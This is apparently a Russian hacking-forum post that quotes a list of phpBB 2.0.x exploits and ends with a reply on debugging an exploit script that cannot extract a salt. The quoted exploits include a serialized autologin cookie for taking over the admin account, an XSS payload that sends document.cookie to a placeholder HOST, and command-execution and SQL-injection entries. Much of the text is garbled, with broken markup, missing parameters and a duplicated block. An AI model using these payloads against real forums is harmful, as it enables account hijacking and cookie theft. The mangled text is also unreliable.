[QUOTE="qBiN"] ↑
Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии 2.0.4
, т.к. версии младше, обсуждать нет смысла.
[B]phpBB [/COLOR]
"
Где
- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать " ping test.com
"),
- ID пользователя.
Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где
URL сайта
- директория
- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где
- ip сервера,
- директория в которой находится форум
номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например http://site.com/phpBB/
, - нужная команда (о командах читаем тут /threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
- ID пользователя.
Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где
URL сайта
- директория
- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где
- ip сервера,
- директория в которой находится форум
номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например http://site.com/phpBB/
, - нужная команда (о командах читаем тут /threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
Вот здесь вкратце описывал, что нужно делать. Судя по ошибке на скрине, скрипт эксплоита не может выдрать соль из ответа. Возможно от версии к версии пляшет вёрстка или нейминг, либо WAF блочит запрос. Лучшим вариантом будет установить эту верисю двига локально и воспроизвести все действия вручную и потом отдебажить эксплоит.